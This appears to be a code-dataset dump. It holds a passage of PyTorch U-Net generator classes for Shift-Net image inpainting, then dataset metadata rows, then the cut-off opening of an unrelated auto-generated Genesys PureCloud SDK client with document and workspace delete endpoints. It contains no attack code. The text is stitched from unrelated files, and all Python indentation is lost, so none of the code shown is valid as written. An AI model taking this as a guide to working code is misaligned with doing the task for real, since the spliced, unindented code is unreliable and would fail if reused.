def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False):
super(UnetSkipConnectionShiftTriple, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc, affine=True)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc, affine=True)
# As the downconv layer is outer_nc in and inner_nc out.
# So the shift define like this:
shift = InnerShiftTriple(opt.fixed_mask, opt.shift_sz, opt.stride, opt.mask_thred, opt.triple_weight)
shift.set_mask(mask_global, 3)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCos = InnerCos(strength=opt.strength, skip=opt.skip)
innerCos.set_mask(mask_global, 3) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCos)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# shift triple differs in here. It is `*3` not `*2`.
upconv = nn.ConvTranspose2d(inner_nc * 3, outer_nc,
kernel_size=4, stride=2,
padding=1)
down = [downrelu, downconv, downnorm]
# shift should be placed after uprelu
# NB: innerCos are placed before shift. So need to add the latent gredient to
# to former part.
up = [uprelu, innerCos, shift, innerCos, upconv, upnorm]
if use_dropout:
model = down + [submodule] + up + [nn.Dropout(0.5)]
else:
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
################################### *************************** #####################################
################################### This the accelerated Shift_net #####################################
################################### *************************** #####################################
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class AcceleratedUnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_dropout=False):
super(AcceleratedUnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True)
print(unet_block)
for i in range(num_downs - 5): # The innner layers number is 3 (sptial size:512*512), if unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_dropout=use_dropout)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer)
unet_shift_block = AcceleratedUnetSkipConnectionShiftTriple(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer) # passing in unet_shift_block
unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer)
self.model = unet_block
def forward(self, input):
return self.model(input)
# Mention: the TripleBlock differs in `upconv` defination.
# 'cos' means that we add a `innerCos` layer in the block.
class AcceleratedUnetSkipConnectionShiftTriple(nn.Module):
def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d,
use_dropout=False):
super(AcceleratedUnetSkipConnectionShiftTriple, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc, affine=True)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc, affine=True)
# As the downconv layer is outer_nc in and inner_nc out.
# So the shift define like this:
shift = AcceleratedInnerShiftTriple(opt.fixed_mask, opt.shift_sz, opt.stride, opt.mask_thred,
opt.triple_weight)
shift.set_mask(mask_global, 3)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCos = InnerCos(strength=opt.strength, skip=opt.skip)
innerCos.set_mask(mask_global, 3) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCos)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# shift triple differs in here. It is `*3` not `*2`.
upconv = nn.ConvTranspose2d(inner_nc * 3, outer_nc,
kernel_size=4, stride=2,
padding=1)
down = [downrelu, downconv, downnorm]
# shift should be placed after uprelu
# NB: innerCos are placed before shift. So need to add the latent gredient to
# to former part.
up = [uprelu, innerCos, shift, upconv, upnorm]
if use_dropout:
model = down + [submodule] + up + [nn.Dropout(0.5)]
else:
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
class SoftUnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_dropout=False):
super(SoftUnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True)
print(unet_block)
for i in range(num_downs - 5): # The innner layers number is 3 (sptial size:512*512), if unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_dropout=use_dropout)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer)
unet_shift_block = SoftUnetSkipConnectionBlock(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer, shift_layer=True) # passing in unet_shift_block
unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer)
self.model = unet_block
def forward(self, input):
return self.model(input)
# construct network from the inside to the outside.
# Defines the submodule with skip connection.
# X -------------------identity---------------------- X
# |-- downsampling -- |submodule| -- upsampling --|
class SoftUnetSkipConnectionBlock(nn.Module):
def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False):
super(SoftUnetSkipConnectionBlock, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc, affine=True)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc, affine=True)
# As the downconv layer is outer_nc in and inner_nc out.
# So the shift define like this:
shift = InnerSoftShiftTriple(opt.fixed_mask, opt.shift_sz, opt.stride, opt.mask_thred, opt.triple_weight)
shift.set_mask(mask_global, 3)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCosBefore = InnerCos(strength=opt.strength, skip=opt.skip)
innerCosBefore.set_mask(mask_global, 3) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCosBefore)
innerCosAfter = InnerCos(strength=opt.strength, skip=opt.skip)
innerCosAfter.set_mask(mask_global, 3) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCosAfter)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# shift triple differs in here. It is `*3` not `*2`.
upconv = nn.ConvTranspose2d(inner_nc * 3, outer_nc,
kernel_size=4, stride=2,
padding=1)
down = [downrelu, downconv, downnorm]
# shift should be placed after uprelu
# NB: innerCos are placed before shift. So need to add the latent gredient to
# to former part.
up = [uprelu, innerCosBefore, shift, innerCosAfter, upconv, upnorm]
if use_dropout:
model = down + [submodule] + up + [nn.Dropout(0.5)]
else:
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
class InceptionUnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_dropout=False):
super(InceptionUnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = InceptionUnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True)
for i in range(num_downs - 5): # The innner layers number is 3 (sptial size:512*512), if unet_256.
unet_block = InceptionUnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_dropout=use_dropout)
unet_block = InceptionUnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer)
unet_shift_block = InceptionShiftUnetSkipConnectionBlock(ngf * 2, ngf * 4, opt=opt, innerCos_list=innerCos_list, shift_list=shift_list,
mask_global=mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer, shift_layer=True) # passing in unet_shift_block # innerCos_list=None, shift_list=None, mask_global=None, input_nc=None, opt=None,\submodule=None, shift_layer=False, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False
unet_block = InceptionUnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer)
unet_block = InceptionUnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer)
self.model = unet_block
def forward(self, input):
return self.model(input)
# construct network from the inside to the outside.
# Defines the submodule with skip connection.
# X -------------------identity---------------------- X
# |-- downsampling -- |submodule| -- upsampling --|
class InceptionUnetSkipConnectionBlock(nn.Module):
def __init__(self, outer_nc, inner_nc, input_nc,
submodule=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False):
super(InceptionUnetSkipConnectionBlock, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = InceptionDown(input_nc, inner_nc) # nn.Conv2d(input_nc, inner_nc, kernel_size=4,stride=2, padding=1)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc, affine=True)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc, affine=True)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,kernel_size=4, stride=2,padding=1)
downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = InceptionUp(inner_nc, outer_nc) #nn.ConvTranspose2d(inner_nc, outer_nc,kernel_size=4, stride=2,padding=1)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
upconv = InceptionUp(inner_nc * 2, outer_nc) #nn.ConvTranspose2d(inner_nc * 2, outer_nc,kernel_size=4, stride=2,padding=1)
down = [downrelu, downconv, downnorm]
up = [uprelu, upconv, upnorm]
if use_dropout:
model = down + [submodule] + up + [nn.Dropout(0.5)]
else:
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
# construct network from the inside to the outside.
# Defines the submodule with skip connection.
# X -------------------identity---------------------- X
# |-- downsampling -- |submodule| -- upsampling --|
class InceptionShiftUnetSkipConnectionBlock(nn.Module):
def __init__(self, outer_nc, inner_nc, innerCos_list=None, shift_list=None, mask_global=None, input_nc=None, opt=None,\
submodule=None, shift_layer=False, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False):
super(InceptionShiftUnetSkipConnectionBlock, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
if shift_layer:
# As the downconv layer is outer_nc in and inner_nc out.
# So the shift define like this:
shift = AcceleratedInnerShiftTriple(opt.fixed_mask, opt.shift_sz, opt.stride, opt.mask_thred, opt.triple_weight)
shift.set_mask(mask_global, 3)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCosBefore = InnerCos(strength=opt.strength, skip=opt.skip)
innerCosBefore.set_mask(mask_global, 3) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCosBefore)
innerCosAfter = InnerCos(strength=opt.strength, skip=opt.skip)
innerCosAfter.set_mask(mask_global, 3) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCosAfter)
downconv = InceptionDown(input_nc, inner_nc) # nn.Conv2d(input_nc, inner_nc, kernel_size=4,stride=2, padding=1)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc, affine=True)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc, affine=True)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,kernel_size=4, stride=2,padding=1)
downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = InceptionUp(inner_nc, outer_nc) #nn.ConvTranspose2d(inner_nc, outer_nc,kernel_size=4, stride=2,padding=1)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
upconv = InceptionUp(inner_nc * 3, outer_nc) #nn.ConvTranspose2d(inner_nc * 2, outer_nc,kernel_size=4, stride=2,padding=1)
down = [downrelu, downconv, downnorm]
up = [uprelu, innerCosBefore, shift, innerCosAfter, upconv, upnorm]
if use_dropout:
model = down + [submodule] + up + [nn.Dropout(0.5)]
else:
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
| 50.295019
| 332
| 0.58353
| 3,049
| 26,254
| 4.838636
| 0.066251
| 0.041483
| 0.021148
| 0.029282
| 0.911476
| 0.909035
| 0.909035
| 0.907002
| 0.907002
| 0.902528
| 0
| 0.014962
| 0.307572
| 26,254
| 522
| 333
| 50.295019
| 0.796578
| 0.207245
| 0
| 0.831429
| 0
| 0
| 0.001973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051429
| false
| 0
| 0.025714
| 0.011429
| 0.142857
| 0.005714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b40b6fed2d4068002dc842000b5e9bcbcf0c4b9a
| 130,927
|
py
|
Python
|
build/PureCloudPlatformClientV2/apis/content_management_api.py
|
cjohnson-ctl/platform-client-sdk-python
|
38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100
|
[
"MIT"
] | 10
|
2019-02-22T00:27:08.000Z
|
2021-09-12T23:23:44.000Z
|
libs/PureCloudPlatformClientV2/apis/content_management_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 5
|
2018-06-07T08:32:00.000Z
|
2021-07-28T17:37:26.000Z
|
libs/PureCloudPlatformClientV2/apis/content_management_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 6
|
2020-04-09T17:43:07.000Z
|
2022-02-17T08:48:05.000Z
|
# coding: utf-8
"""
ContentManagementApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ContentManagementApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def delete_contentmanagement_document(self, document_id, **kwargs):
"""
Delete a document.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_contentmanagement_document(document_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str document_id: Document ID (required)
:param bool override: Override any lock on the document
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['document_id', 'override']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_contentmanagement_document" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'document_id' is set
if ('document_id' not in params) or (params['document_id'] is None):
raise ValueError("Missing the required parameter `document_id` when calling `delete_contentmanagement_document`")
resource_path = '/api/v2/contentmanagement/documents/{documentId}'.replace('{format}', 'json')
path_params = {}
if 'document_id' in params:
path_params['documentId'] = params['document_id']
query_params = {}
if 'override' in params:
query_params['override'] = params['override']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_contentmanagement_share(self, share_id, **kwargs):
"""
Deletes an existing share.
This revokes sharing rights specified in the share record
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_contentmanagement_share(share_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str share_id: Share ID (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['share_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_contentmanagement_share" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'share_id' is set
if ('share_id' not in params) or (params['share_id'] is None):
raise ValueError("Missing the required parameter `share_id` when calling `delete_contentmanagement_share`")
resource_path = '/api/v2/contentmanagement/shares/{shareId}'.replace('{format}', 'json')
path_params = {}
if 'share_id' in params:
path_params['shareId'] = params['share_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_contentmanagement_status_status_id(self, status_id, **kwargs):
"""
Cancel the command for this status
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_contentmanagement_status_status_id(status_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str status_id: Status ID (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['status_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_contentmanagement_status_status_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'status_id' is set
if ('status_id' not in params) or (params['status_id'] is None):
raise ValueError("Missing the required parameter `status_id` when calling `delete_contentmanagement_status_status_id`")
resource_path = '/api/v2/contentmanagement/status/{statusId}'.replace('{format}', 'json')
path_params = {}
if 'status_id' in params:
path_params['statusId'] = params['status_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_contentmanagement_workspace(self, workspace_id, **kwargs):
"""
Delete a workspace
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_contentmanagement_workspace(workspace_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str move_children_to_workspace_id: New location for objects in deleted workspace.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'move_children_to_workspace_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_contentmanagement_workspace" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `delete_contentmanagement_workspace`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
if 'move_children_to_workspace_id' in params:
query_params['moveChildrenToWorkspaceId'] = params['move_children_to_workspace_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_contentmanagement_workspace_member(self, workspace_id, member_id, **kwargs):
"""
Delete a member from a workspace
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_contentmanagement_workspace_member(workspace_id, member_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str member_id: Member ID (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'member_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_contentmanagement_workspace_member" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `delete_contentmanagement_workspace_member`")
# verify the required parameter 'member_id' is set
if ('member_id' not in params) or (params['member_id'] is None):
raise ValueError("Missing the required parameter `member_id` when calling `delete_contentmanagement_workspace_member`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/members/{memberId}'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
if 'member_id' in params:
path_params['memberId'] = params['member_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_contentmanagement_workspace_tagvalue(self, workspace_id, tag_id, **kwargs):
"""
Delete workspace tag
Delete a tag from a workspace. Will remove this tag from all documents.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_contentmanagement_workspace_tagvalue(workspace_id, tag_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str tag_id: Tag ID (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'tag_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_contentmanagement_workspace_tagvalue" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `delete_contentmanagement_workspace_tagvalue`")
# verify the required parameter 'tag_id' is set
if ('tag_id' not in params) or (params['tag_id'] is None):
raise ValueError("Missing the required parameter `tag_id` when calling `delete_contentmanagement_workspace_tagvalue`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/tagvalues/{tagId}'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
if 'tag_id' in params:
path_params['tagId'] = params['tag_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
